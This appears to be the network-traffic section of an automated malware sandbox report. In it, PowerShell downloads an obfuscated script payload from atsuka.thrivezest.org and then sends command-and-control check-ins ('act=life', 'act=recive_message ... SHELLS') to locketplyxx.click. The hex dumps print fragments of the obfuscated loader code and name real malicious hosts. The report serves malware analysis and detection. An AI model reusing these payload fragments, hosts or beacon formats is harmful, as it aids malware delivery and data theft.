                                                                                                                                            2024-12-21 19:13:35 UTC1369INData Raw: 52 33 38 6b 32 63 4f 33 34 6e 33 35 5a 33 32 55 32 63 69 33 34 62 33 35 50 33 37 6f 32 63 58 33 34 4d 33 35 4f 33 38 6e 32 63 69 33 34 78 33 35 56 33 37 41 32 63 44 33 34 4e 33 35 74 33 37 61 32 63 6d 33 34 65 33 37 47 33 32 6b 32 63 4d 33 34 61 33 37 4a 33 31 6e 32 63 48 33 34 57 33 36 4b 33 38 53 32 63 4f 33 34 4c 33 37 77 33 31 4d 32 63 62 33 34 74 33 35 55 33 31 7a 32 63 4e 33 34 6d 33 36 6c 33 38 46 32 63 4a 33 34 51 33 35 51 33 31 63 32 63 48 33 34 72 33 35 57 33 34 64 32 63 42 33 34 72 33 35 78 33 33 6b 32 63 67 33 34 70 33 35 48 33 34 49 32 63 53 33 34 63 33 37 67 33 31 42 32 63 43 33 34 76 33 35 59 33 31 57 32 63 42 33 34 49 33 35 5a 33 37 4b 32 63 73 33 34 75 33 36 4d 33 38 41 32 63 73 33 34 41 33 36 61 33 39 76 32 63 4b 33 34 67 33 35 67 33 38
                                                                                                                                            Data Ascii: R38k2cO34n35Z32U2ci34b35P37o2cX34M35O38n2ci34x35V37A2cD34N35t37a2cm34e37G32k2cM34a37J31n2cH34W36K38S2cO34L37w31M2cb34t35U31z2cN34m36l38F2cJ34Q35Q31c2cH34r35W34d2cB34r35x33k2cg34p35H34I2cS34c37g31B2cC34v35Y31W2cB34I35Z37K2cs34u36M38A2cs34A36a39v2cK34g35g38
                                                                                                                                            2024-12-21 19:13:35 UTC1369INData Raw: 33 38 52 32 63 71 33 34 75 33 35 41 33 38 44 32 63 58 33 34 68 33 35 53 33 31 45 32 63 45 33 34 62 33 35 67 33 32 4b 32 63 65 33 34 74 33 36 53 33 38 43 32 63 54 33 34 5a 33 35 4d 33 33 56 32 63 58 33 34 4d 33 35 66 33 32 67 32 63 72 33 34 61 33 35 67 33 30 66 32 63 69 33 34 62 33 37 45 33 32 72 32 63 4c 33 34 71 33 37 61 33 31 69 32 63 47 33 34 5a 33 36 70 33 37 63 32 63 66 33 34 71 33 35 59 33 38 63 32 63 78 33 34 41 33 35 48 33 35 6d 32 63 58 33 34 68 33 36 42 33 39 5a 32 63 62 33 34 6a 33 36 74 33 37 65 32 63 4f 33 34 55 33 35 4c 33 34 78 32 63 41 33 34 6d 33 37 57 33 32 63 32 63 57 33 34 6f 33 35 79 33 37 6e 32 63 54 33 34 6a 33 35 76 33 31 74 32 63 6a 33 34 6a 33 35 70 33 38 68 32 63 6e 33 34 44 33 35 6a 33 36 71 32 63 53 33 34 74 33 35 48 33 37 41
                                                                                                                                            Data Ascii: 38R2cq34u35A38D2cX34h35S31E2cE34b35g32K2ce34t36S38C2cT34Z35M33V2cX34M35f32g2cr34a35g30f2ci34b37E32r2cL34q37a31i2cG34Z36p37c2cf34q35Y38c2cx34A35H35m2cX34h36B39Z2cb34j36t37e2cO34U35L34x2cA34m37W32c2cW34o35y37n2cT34j35v31t2cj34j35p38h2cn34D35j36q2cS34t35H37A


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.449737172.67.183.274437692C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-21 19:13:41 UTC80OUTGET /hubus.xlm HTTP/1.1
                                                                                                                                            Host: atsuka.thrivezest.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-21 19:13:43 UTC995INHTTP/1.1 200 OK
                                                                                                                                            Date: Sat, 21 Dec 2024 19:13:43 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 9508605
                                                                                                                                            Connection: close
                                                                                                                                            X-Powered-By: Express
                                                                                                                                            ETag: W/"9116fd-9yrU921jJidPRBXO8zb1nPN2AM8"
                                                                                                                                            Set-Cookie: connect.sid=s%3AQ0MNHXs9NfOPL1TjMayUvaZmze8GoQ1d.J4AkYZOHJiLu6SM1r7XeseoP13wBsaKRIUs7qwSbfPI; Path=/; HttpOnly
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7LfxM7rraqFdfaj4UmOSgOdHQ1M%2BO3wt08xVBt8V2HRVuGUiM4F%2FJg%2Fm0ostsQLsy5SH8FsTf940We2bnbN9uj2%2FdKNummoGOU1be%2FgDEOzofayjzm4Oazzq6wLLK9GH%2Fnuw%2F3nPBUU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f5a30db6bfe7283-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=1982&rtt_var=772&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=694&delivery_rate=1473259&cwnd=244&unsent_bytes=0&cid=a3d54832eaadec9f&ts=1938&x=0"
                                                                                                                                            2024-12-21 19:13:43 UTC374INData Raw: 24 56 78 35 57 4b 51 68 55 4f 4e 32 6a 66 65 77 4c 50 74 78 79 47 71 6b 45 63 6b 30 70 59 52 69 48 53 71 46 32 35 4d 6b 74 69 75 56 68 35 71 62 4c 76 43 57 59 49 59 52 46 42 39 56 6a 6d 6c 53 4d 38 57 79 70 78 58 6e 42 62 42 45 65 41 4c 76 41 4d 4e 77 54 52 38 50 41 4e 64 70 30 7a 30 78 35 71 49 37 64 63 34 4a 58 62 6c 46 77 6a 36 72 33 4e 42 53 72 4b 35 35 62 78 44 65 41 63 61 32 32 47 58 42 6b 37 4e 64 61 52 68 6f 35 47 65 30 6e 4a 52 72 69 30 54 53 36 56 78 44 43 43 57 73 37 30 49 55 58 68 61 74 48 30 4e 77 34 58 34 31 70 32 61 5a 7a 70 68 6d 69 52 32 6f 4e 73 64 69 70 71 6f 65 50 59 39 4b 75 52 38 34 37 6d 42 65 73 6f 31 59 43 32 48 67 54 72 65 4d 78 44 63 4f 46 58 48 48 55 63 38 51 70 64 6a 53 57 75 75 74 7a 70 47 41 43 34 6c 36 38 72 55 76 68 41 66
                                                                                                                                            Data Ascii: $Vx5WKQhUON2jfewLPtxyGqkEck0pYRiHSqF25MktiuVh5qbLvCWYIYRFB9VjmlSM8WypxXnBbBEeALvAMNwTR8PANdp0z0x5qI7dc4JXblFwj6r3NBSrK55bxDeAca22GXBk7NdaRho5Ge0nJRri0TS6VxDCCWs70IUXhatH0Nw4X41p2aZzphmiR2oNsdipqoePY9KuR847mBeso1YC2HgTreMxDcOFXHHUc8QpdjSWuutzpGAC4l68rUvhAf
                                                                                                                                            2024-12-21 19:13:43 UTC1369INData Raw: 3d 20 22 47 65 74 42 79 22 0d 0a 0d 0a 24 49 36 48 68 6d 37 72 75 67 58 35 34 50 49 44 67 44 63 50 76 68 67 51 45 37 50 34 7a 66 67 6c 76 43 74 47 43 33 7a 42 72 39 71 30 5a 74 68 50 71 54 52 4e 38 51 51 38 4e 61 71 4a 59 50 79 44 44 67 71 35 79 66 78 45 35 5a 56 62 6a 6a 51 6c 31 64 63 31 50 41 47 65 4e 59 4f 69 38 31 64 34 59 77 73 41 6b 4a 59 73 53 65 4b 32 63 66 61 30 33 4f 46 74 68 67 45 30 61 4d 74 51 55 76 47 64 79 62 70 4e 4a 34 44 6b 4a 61 44 74 63 59 44 55 41 63 63 75 5a 70 38 34 46 74 42 45 66 76 39 41 45 75 30 4a 70 71 6d 76 4d 4f 50 51 50 64 59 6a 69 4d 57 70 64 6e 31 53 42 70 65 4b 32 54 34 55 52 6a 66 56 74 53 61 4b 69 56 54 38 69 66 54 42 47 50 42 70 59 39 59 32 74 50 31 41 53 61 4d 61 72 38 32 4a 47 4c 38 36 37 61 6d 72 31 6d 6d 47 4d 6b
                                                                                                                                            Data Ascii: = "GetBy"$I6Hhm7rugX54PIDgDcPvhgQE7P4zfglvCtGC3zBr9q0ZthPqTRN8QQ8NaqJYPyDDgq5yfxE5ZVbjjQl1dc1PAGeNYOi81d4YwsAkJYsSeK2cfa03OFthgE0aMtQUvGdybpNJ4DkJaDtcYDUAccuZp84FtBEfv9AEu0JpqmvMOPQPdYjiMWpdn1SBpeK2T4URjfVtSaKiVT8ifTBGPBpY9Y2tP1ASaMar82JGL867amr1mmGMk
                                                                                                                                            2024-12-21 19:13:43 UTC1369INData Raw: 79 41 42 6d 74 78 55 53 71 50 55 70 36 76 69 37 74 59 71 46 4c 67 4c 69 37 49 54 72 51 45 57 33 6f 66 34 7a 48 55 31 44 4d 75 73 62 30 54 48 37 59 6f 79 38 32 50 62 6f 4f 36 56 76 37 68 42 6d 32 49 4b 39 46 38 50 55 6b 63 52 78 45 75 7a 66 53 4e 46 69 45 51 53 73 6f 74 31 75 65 4c 46 77 5a 52 35 49 73 65 6f 6b 70 77 6d 74 45 36 5a 76 6b 4b 47 56 34 77 77 68 44 68 62 39 44 56 49 4a 58 33 30 58 41 69 62 76 65 4f 67 68 45 54 32 30 59 77 55 67 73 4c 62 67 30 65 5a 54 6b 6e 5a 72 79 51 76 65 4a 6e 65 51 36 78 63 4a 55 58 46 53 6d 78 4e 50 79 76 4c 49 4d 72 65 42 59 45 57 4e 79 55 45 6b 46 72 50 32 44 65 74 51 4e 41 72 68 4c 50 6e 71 43 41 54 36 5a 46 32 57 78 7a 58 37 64 68 34 79 78 51 69 4c 4a 4f 46 4b 61 30 53 4a 4e 70 34 6b 33 54 4e 5a 4c 50 77 56 32 58 46
                                                                                                                                            Data Ascii: yABmtxUSqPUp6vi7tYqFLgLi7ITrQEW3of4zHU1DMusb0TH7Yoy82PboO6Vv7hBm2IK9F8PUkcRxEuzfSNFiEQSsot1ueLFwZR5IseokpwmtE6ZvkKGV4wwhDhb9DVIJX30XAibveOghET20YwUgsLbg0eZTknZryQveJneQ6xcJUXFSmxNPyvLIMreBYEWNyUEkFrP2DetQNArhLPnqCAT6ZF2WxzX7dh4yxQiLJOFKa0SJNp4k3TNZLPwV2XF
                                                                                                                                            2024-12-21 19:13:43 UTC1369INData Raw: 47 37 78 41 6d 77 75 63 50 45 32 64 6c 64 74 77 48 41 34 6b 4c 32 38 4d 59 50 71 77 38 69 64 74 68 77 58 58 65 20 2b 20 24 56 6a 4d 37 34 73 56 73 66 6f 59 4a 44 51 34 55 6a 31 59 59 49 79 75 58 37 59 62 7a 64 6e 47 4f 49 70 67 74 67 4b 64 76 6e 4a 59 79 34 43 4b 49 41 61 63 55 70 73 47 53 4d 68 56 65 6a 66 46 39 52 56 65 78 31 4c 49 6b 31 57 52 79 63 43 69 30 30 79 58 71 49 79 73 79 64 31 33 69 68 6f 70 6f 55 63 6a 64 30 4e 69 71 50 34 6c 47 65 6f 72 46 39 65 69 32 72 66 31 49 33 50 4f 6d 4a 76 78 4c 56 75 50 39 51 62 30 75 55 43 78 72 4d 45 6e 36 78 4f 54 6a 53 54 75 4d 6d 77 61 59 6c 35 52 64 6a 51 70 62 75 54 4a 31 48 4d 65 50 30 75 4c 52 77 4e 30 54 70 47 30 6f 76 4f 41 61 7a 47 49 71 38 32 52 75 41 66 69 58 44 69 42 63 5a 32 33 78 58 31 34 4a 31 4a
                                                                                                                                            Data Ascii: G7xAmwucPE2dldtwHA4kL28MYPqw8idthwXXe + $VjM74sVsfoYJDQ4Uj1YYIyuX7YbzdnGOIpgtgKdvnJYy4CKIAacUpsGSMhVejfF9RVex1LIk1WRycCi00yXqIysyd13ihopoUcjd0NiqP4lGeorF9ei2rf1I3POmJvxLVuP9Qb0uUCxrMEn6xOTjSTuMmwaYl5RdjQpbuTJ1HMeP0uLRwN0TpG0ovOAazGIq82RuAfiXDiBcZ23xX14J1J
                                                                                                                                            2024-12-21 19:13:43 UTC1369INData Raw: 24 5a 4f 43 6d 4a 75 6a 44 50 73 66 29 2d 28 33 37 2d 34 30 2d 34 29 29 7b 0d 0a 28 28 28 28 24 45 46 43 4f 71 78 6a 57 53 44 61 2d 31 36 2d 24 51 43 48 78 45 74 57 74 70 58 65 43 46 2d 34 2d 34 34 2d 24 66 4f 68 55 4a 7a 6f 42 4d 77 29 29 2b 28 28 24 51 55 56 4d 6c 78 6b 69 68 43 54 2d 33 39 2d 32 33 29 29 29 29 20 0d 0a 7b 0d 0a 24 56 48 78 51 55 79 79 43 20 3d 20 36 31 30 0d 0a 24 69 61 6e 54 61 57 20 3d 20 24 6c 42 63 74 7a 4c 43 73 57 76 72 73 57 0d 0a 24 72 5a 74 47 4b 63 61 50 69 73 59 20 3d 20 24 55 73 46 6b 4f 71 50 6a 74 4e 0d 0a 24 4d 58 6b 62 43 6c 56 59 73 70 57 20 3d 20 24 6c 42 63 74 7a 4c 43 73 57 76 72 73 57 0d 0a 24 50 57 4d 74 73 43 76 73 20 3d 20 24 45 46 43 4f 71 78 6a 57 53 44 61 0d 0a 7d 0d 0a 28 28 28 33 2b 32 39 2d 28 34 37 2d 33
                                                                                                                                            Data Ascii: $ZOCmJujDPsf)-(37-40-4)){(((($EFCOqxjWSDa-16-$QCHxEtWtpXeCF-4-44-$fOhUJzoBMw))+(($QUVMlxkihCT-39-23)))) {$VHxQUyyC = 610$ianTaW = $lBctzLCsWvrsW$rZtGKcaPisY = $UsFkOqPjtN$MXkbClVYspW = $lBctzLCsWvrsW$PWMtsCvs = $EFCOqxjWSDa}(((3+29-(47-3
                                                                                                                                            2024-12-21 19:13:43 UTC1369INData Raw: 24 4e 6d 45 47 52 6f 20 3d 20 28 28 28 28 28 33 31 2d 37 2a 31 32 29 2a 34 31 2a 31 30 2d 28 34 2d 34 37 2a 33 31 2a 34 37 2a 31 32 2a 32 32 29 29 2d 28 33 34 2a 33 35 2a 38 29 29 2d 28 31 38 30 34 37 30 30 38 29 29 29 0d 0a 24 5a 59 71 47 47 20 3d 20 24 69 59 62 63 64 68 47 4d 4a 74 0d 0a 24 78 51 41 74 6c 4b 55 66 4d 20 3d 20 24 65 73 6b 57 51 6c 6e 4b 56 75 0d 0a 0d 0a 24 4b 53 59 6c 6e 54 59 44 4d 55 20 3d 20 28 28 24 66 4f 68 55 4a 7a 6f 42 4d 77 2d 34 37 2d 28 32 37 2d 32 32 2b 31 29 29 2b 24 69 61 6e 54 61 57 2d 34 37 2d 32 33 2b 24 4a 52 4f 47 46 75 76 69 64 2b 33 34 2b 31 30 2d 28 34 35 38 29 29 0d 0a 24 78 4c 64 58 59 43 44 45 73 4e 72 51 47 20 3d 20 28 28 31 32 2d 33 39 2b 24 63 7a 49 78 54 52 52 79 58 57 6b 44 6d 55 29 2d 28 31 37 2b 31 2b 24
                                                                                                                                            Data Ascii: $NmEGRo = (((((31-7*12)*41*10-(4-47*31*47*12*22))-(34*35*8))-(18047008)))$ZYqGG = $iYbcdhGMJt$xQAtlKUfM = $eskWQlnKVu$KSYlnTYDMU = (($fOhUJzoBMw-47-(27-22+1))+$ianTaW-47-23+$JROGFuvid+34+10-(458))$xLdXYCDEsNrQG = ((12-39+$czIxTRRyXWkDmU)-(17+1+$
                                                                                                                                            2024-12-21 19:13:43 UTC1369INData Raw: 4e 53 65 68 51 2b 32 30 2d 34 38 29 29 2d 28 32 32 29 29 0d 0a 24 4f 45 72 75 67 56 6b 61 4d 45 20 3d 20 28 28 28 28 34 38 2b 33 34 2b 24 66 4f 68 55 4a 7a 6f 42 4d 77 29 29 29 2b 28 32 34 2b 34 35 2d 24 53 43 64 56 4e 72 72 29 2b 28 24 69 61 6e 54 61 57 2b 31 31 2b 28 24 6e 69 41 53 69 45 2b 32 34 2b 24 44 74 57 45 68 47 4f 57 69 4e 29 29 2b 28 28 34 36 2b 31 38 2b 34 29 29 2d 28 31 31 35 31 29 29 0d 0a 24 73 76 6a 78 61 63 6b 5a 74 42 76 50 52 65 20 3d 20 28 28 28 34 2b 33 31 2d 32 31 29 29 2b 33 37 2d 34 36 2b 24 4a 52 4f 47 46 75 76 69 64 2b 28 28 39 2d 31 33 2d 39 29 29 2b 28 33 32 29 29 0d 0a 24 4c 63 5a 65 54 76 42 20 3d 20 28 28 24 65 73 6b 57 51 6c 6e 4b 56 75 2d 31 36 2b 28 33 32 2b 34 34 2d 24 4b 58 7a 74 71 52 61 29 29 2b 28 28 24 72 73 42 51
                                                                                                                                            Data Ascii: NSehQ+20-48))-(22))$OErugVkaME = ((((48+34+$fOhUJzoBMw)))+(24+45-$SCdVNrr)+($ianTaW+11+($niASiE+24+$DtWEhGOWiN))+((46+18+4))-(1151))$svjxackZtBvPRe = (((4+31-21))+37-46+$JROGFuvid+((9-13-9))+(32))$LcZeTvB = (($eskWQlnKVu-16+(32+44-$KXztqRa))+(($rsBQ
                                                                                                                                            2024-12-21 19:13:43 UTC1369INData Raw: 2d 31 33 2d 28 32 35 30 38 29 29 0d 0a 24 57 4e 64 49 72 4c 72 41 20 3d 20 28 28 28 28 34 30 2b 32 38 2b 24 4a 59 45 53 41 66 51 44 46 5a 77 72 6b 63 29 29 2b 24 79 53 6f 50 6b 77 76 7a 72 2d 34 35 2b 33 33 2b 28 34 31 2d 34 32 2b 34 34 29 29 2d 24 77 45 72 44 54 69 4b 41 6b 4d 62 6a 72 2b 33 39 2b 24 51 61 53 6e 76 70 42 50 6a 57 55 53 46 2d 24 74 74 6a 50 6d 64 69 79 5a 2d 34 2d 33 32 2d 28 34 33 31 29 29 0d 0a 24 6c 4d 4c 4e 6b 71 20 3d 20 28 28 32 37 2b 33 39 2b 35 29 2b 24 62 58 4c 67 65 54 73 6f 59 2d 34 31 2d 32 37 2b 24 51 43 48 78 45 74 57 74 70 58 65 43 46 2d 39 2d 34 35 2d 28 31 30 31 35 29 29 0d 0a 24 48 79 70 67 6c 45 46 6b 42 42 52 20 3d 20 28 28 28 24 4d 58 6b 62 43 6c 56 59 73 70 57 2b 34 39 2d 31 32 29 2b 28 24 4e 6d 45 47 52 6f 2b 36 2b
                                                                                                                                            Data Ascii: -13-(2508))$WNdIrLrA = ((((40+28+$JYESAfQDFZwrkc))+$ySoPkwvzr-45+33+(41-42+44))-$wErDTiKAkMbjr+39+$QaSnvpBPjWUSF-$ttjPmdiyZ-4-32-(431))$lMLNkq = ((27+39+5)+$bXLgeTsoY-41-27+$QCHxEtWtpXeCF-9-45-(1015))$HypglEFkBBR = ((($MXkbClVYspW+49-12)+($NmEGRo+6+
                                                                                                                                            2024-12-21 19:13:43 UTC1369INData Raw: 6d 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4b 70 6f 4b 58 64 45 73 72 62 7a 46 73 4a 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 53 62 55 5a 6d 43 6a 41 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4b 79 69 56 68 6d 77 61 50 63 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4a 4f 48 61 70 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 58 75 63 41 51 55 4b 4e 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 61 51 4a 42 77 42 6b 6c 73 46 6d 50 43 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 49 79 55 67 77 42 75 6b 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 41 70 58 68 61 55 54 62 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 44 61 56 4b 57 51 4a 55 6d 42 5a 57 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 45 6c 43 41 77 44 43 4b 65 48 59 20 2b 20 5b 63 68 61
                                                                                                                                            Data Ascii: m + [char][int]$KpoKXdEsrbzFsJ + [char][int]$SbUZmCjA + [char][int]$KyiVhmwaPc + [char][int]$JOHap + [char][int]$XucAQUKN + [char][int]$aQJBwBklsFmPC + [char][int]$IyUgwBuk + [char][int]$ApXhaUTb + [char][int]$DaVKWQJUmBZW + [char][int]$ElCAwDCKeHY + [cha
                                                                                                                                            2024-12-21 19:13:43 UTC1369INData Raw: 54 2d 33 39 2d 32 33 29 29 29 29 20 0d 0a 7b 0d 0a 24 56 48 78 51 55 79 79 43 20 3d 20 36 31 30 0d 0a 24 69 61 6e 54 61 57 20 3d 20 24 6c 42 63 74 7a 4c 43 73 57 76 72 73 57 0d 0a 24 72 5a 74 47 4b 63 61 50 69 73 59 20 3d 20 24 55 73 46 6b 4f 71 50 6a 74 4e 0d 0a 24 4d 58 6b 62 43 6c 56 59 73 70 57 20 3d 20 24 6c 42 63 74 7a 4c 43 73 57 76 72 73 57 0d 0a 24 50 57 4d 74 73 43 76 73 20 3d 20 24 45 46 43 4f 71 78 6a 57 53 44 61 0d 0a 7d 0d 0a 28 28 28 33 2b 32 39 2d 28 34 37 2d 33 36 2a 33 35 2a 33 38 2b 34 31 2d 28 33 31 2d 31 33 2a 31 38 29 29 29 2d 28 34 37 36 30 33 29 29 29 20 0d 0a 7b 0d 0a 24 41 4a 56 63 55 54 72 48 72 70 45 20 3d 20 39 31 34 0d 0a 24 79 4a 6b 70 6d 54 4c 51 20 3d 20 24 4d 58 6b 62 43 6c 56 59 73 70 57 0d 0a 7d 0d 0a 28 28 28 24 72 73
                                                                                                                                            Data Ascii: T-39-23)))) {$VHxQUyyC = 610$ianTaW = $lBctzLCsWvrsW$rZtGKcaPisY = $UsFkOqPjtN$MXkbClVYspW = $lBctzLCsWvrsW$PWMtsCvs = $EFCOqxjWSDa}(((3+29-(47-36*35*38+41-(31-13*18)))-(47603))) {$AJVcUTrHrpE = 914$yJkpmTLQ = $MXkbClVYspW}((($rs


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.449820172.67.151.1934437704C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-21 19:15:17 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8
                                                                                                                                            Host: locketplyxx.click
                                                                                                                                            2024-12-21 19:15:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                            Data Ascii: act=life
                                                                                                                                            2024-12-21 19:15:29 UTC1137INHTTP/1.1 200 OK
                                                                                                                                            Date: Sat, 21 Dec 2024 19:15:29 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=6p17loev0atchmhosq76285tpj; expires=Wed, 16 Apr 2025 13:02:08 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Qb0xkCDFBV%2BBT8QL%2FIyEhHjJmo9Eko0F2S41ncxFrOCYcJqlhTieVYrQl7YL8iWELhZxKzQvKTNTZKJ%2FzHsVzHguNVfu23nXvoH%2F%2BilB7S%2FJHRl8aHSzIHpj0AL4xyGPKx0Ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f5a33330bec726e-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1864&min_rtt=1799&rtt_var=721&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1623123&cwnd=224&unsent_bytes=0&cid=9aff1f6ae07a381c&ts=11964&x=0"
                                                                                                                                            2024-12-21 19:15:29 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                            Data Ascii: 2ok
                                                                                                                                            2024-12-21 19:15:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.449821172.67.151.1934437704C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-21 19:15:30 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 80
                                                                                                                                            Host: locketplyxx.click
                                                                                                                                            2024-12-21 19:15:30 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61
                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--SHELLS&j=aa77e78b6b0dd1b2226e7b799532ab3a
                                                                                                                                            2024-12-21 19:15:31 UTC1134INHTTP/1.1 200 OK
                                                                                                                                            Date: Sat, 21 Dec 2024 19:15:31 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=hmvsd3enb2k14004se51tpch0l; expires=Wed, 16 Apr 2025 13:02:10 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=152WCevQ%2BavJ2qsl8mv4j6T1bmtd%2FRqGIgI%2FMJ6oNJ107j3Mncj9al3hpu8qal5h5Hy0ad6jjQZRifUpVkorRBhWPNeAwBA98%2F9i0M5uwtElXH3CHL9XxoBZmgnBnIRwyRqH9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f5a3385beadc327-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=12360&min_rtt=1587&rtt_var=7117&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=981&delivery_rate=1839949&cwnd=189&unsent_bytes=0&cid=fc67e922f985af8f&ts=1072&x=0"
                                                                                                                                            2024-12-21 19:15:31 UTC235INData Raw: 31 63 63 30 0d 0a 38 64 50 58 45 72 64 68 4b 54 65 75 35 55 30 34 48 73 78 41 42 64 75 30 65 4d 49 6a 52 62 64 79 36 32 6e 36 62 79 2b 46 49 45 4f 4b 38 61 45 77 6a 56 55 46 46 64 32 41 62 77 4a 34 72 53 78 32 76 70 68 61 6f 30 64 6e 6a 52 53 4b 42 59 6b 4b 41 36 64 57 4c 74 50 70 73 58 50 62 45 6b 77 62 6a 49 41 31 47 69 53 58 4f 79 65 2b 32 6c 72 34 41 53 44 64 45 49 6f 46 6d 41 35 45 36 6c 41 76 6b 72 75 37 64 64 38 45 53 6c 50 50 69 53 42 64 65 36 6b 68 62 37 58 64 46 61 70 4f 5a 35 74 51 6a 68 50 59 56 51 33 49 52 54 65 51 6e 72 5a 68 33 45 4e 55 47 39 58 48 4b 46 59 38 39 6d 4a 6b 76 74 59 55 70 45 63 75 33 78 71 44 44 5a 6b 4c 52 66 56 4a 4a 5a 6d 37 74 58 62 65 44 6b 4e 48 77 6f 4d 6e 56
                                                                                                                                            Data Ascii: 1cc08dPXErdhKTeu5U04HsxABdu0eMIjRbdy62n6by+FIEOK8aEwjVUFFd2AbwJ4rSx2vphao0dnjRSKBYkKA6dWLtPpsXPbEkwbjIA1GiSXOye+2lr4ASDdEIoFmA5E6lAvkru7dd8ESlPPiSBde6khb7XdFapOZ5tQjhPYVQ3IRTeQnrZh3ENUG9XHKFY89mJkvtYUpEcu3xqDDZkLRfVJJZm7tXbeDkNHwoMnV
